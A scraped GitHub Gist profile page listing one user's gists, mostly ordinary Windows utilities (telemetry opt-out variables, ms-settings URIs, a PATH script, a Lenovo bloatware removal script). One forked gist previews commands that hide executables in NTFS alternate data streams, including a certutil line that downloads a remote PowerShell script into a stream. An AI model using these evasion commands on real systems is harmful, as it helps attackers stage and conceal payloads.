Skip to content

Instantly share code, notes, and snippets.

View eabase's full-sized avatar

eabase

  • Between the radio ether and you.
View GitHub Profile
@eabase
eabase / mermaid.md
Last active August 25, 2025 15:03
How to use mermaid charts in a README.md
@eabase
eabase / WinTelemetryEnvs.csv
Last active August 21, 2025 22:19
List of Windows-11 Telemetry that can be disabled using environment variables
Tool/Service Environment Variable Effect
PowerShell POWERSHELL_TELEMETRY_OPTOUT=1 Disables telemetry sent to Application Insights
.NET CLI / SDK DOTNET_CLI_TELEMETRY_OPTOUT=1 Prevents sending usage data (commands/ errors/ etc.)
VCPKG VCPKG_DISABLE_METRICS=1 Disables anonymous usage metrics
Azure CLI AZURE_CORE_COLLECT_TELEMETRY=0 Stops Azure CLI from sending usage data
Visual Studio Code VSCODE_TELEMETRY_DISABLE=1 Disables telemetry in VS Code
Visual Studio Code VSCODE_CRASH_REPORTER_DISABLE=1 Disables crash reporting
GitHub CLI GH_NO_TELEMETRY=1 Prevents GitHub CLI from sending telemetry
Application Insights SDK APPLICATIONINSIGHTS_NO_DIAGNOSTIC_CHANNEL=1 Disables diagnostic channel used for telemetry
Windows Terminal N/A No known environment variable; telemetry controlled via settings.json
@eabase
eabase / windows11-ms-settings-uri-commands.csv
Created August 14, 2025 16:17 — forked from dbilanoski/windows11-ms-settings-uri-commands.csv
Complete List Of Windows 11 MS-Settings URI Commands
Category Settings Page URI Command
Accounts Access work or school ms-settings:workplace
Accounts Email & app accounts ms-settings:emailandaccounts
Accounts Family & other people ms-settings:otherusers
Accounts Set up a kiosk ms-settings:assignedaccess
Accounts Sign-in options ms-settings:signinoptions
Accounts Sync your settings ms-settings:sync
Accounts Windows Hello setup ms-settings:signinoptions-launchfaceenrollment
Accounts Your info ms-settings:yourinfo
Apps Apps & Features ms-settings:appsfeatures
@eabase
eabase / SystemPath.ps1
Created June 2, 2025 17:27
Windows System/User PATH variable manager and analyzer
#!/usr/bin/env pwsh
# TAB:4sp + EOL:CRLF
#------------------------------------------------------------------------------
# Filename : SystemPath.ps1
# Author : eabase
# Date : 2025-06-02
# Version : 1.0.0
# Encoding : UTF-8
# License : CC-BY-SA-4.0
#------------------------------------------------------------------------------
@eabase
eabase / grok3-1.md
Last active February 25, 2025 15:49
@eabase
eabase / badlenovo.ps1
Created January 24, 2025 01:51 — forked from jcary741/badlenovo.ps1
Removal script for Tobii and Nahimic software on Lenovo Legion 5 devices
# Version: 0.1 (2025-01-18)
# License: MIT, use at your own risk
#
# This script disables the Lenovo-installed "Tobii experience" software and "nahimic" software.
# Tested on a Lenovo Legion Pro 5 (82WM) with Windows 11 24H2.
# Run it with `powershell.exe -noprofile -executionPolicy Bypass -File badlenovo.ps1`
# Following this script, you should be able to uninstall the "Tobii experience" app from the control panel (appwiz.cpl)
#
# After major updates, you may need to re-run this script.
@eabase
eabase / CUDA_Compilers.md
Created May 30, 2024 14:19 — forked from ax3l/CUDA_Compilers.md
CUDA Compilers
@eabase
eabase / Exe_ADS_Methods.md
Created May 27, 2024 00:04 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------
# lunar-lander-3.py - A demo of AI learning for landing physics on the moon, using pygame.
#----------------------------------------------------------
import os, sys
import random, tempfile
import time
import numpy as np
import winsound
@eabase
eabase / main.css
Created October 12, 2022 16:27
One button controls for multiple youtube videos in a 2x3 grid
/* main.css */
header, footer {
font: 14px Arial, sans-serif;
padding: 8px;
color: white;
background-color: black;
clear: left;
text-align: left;
}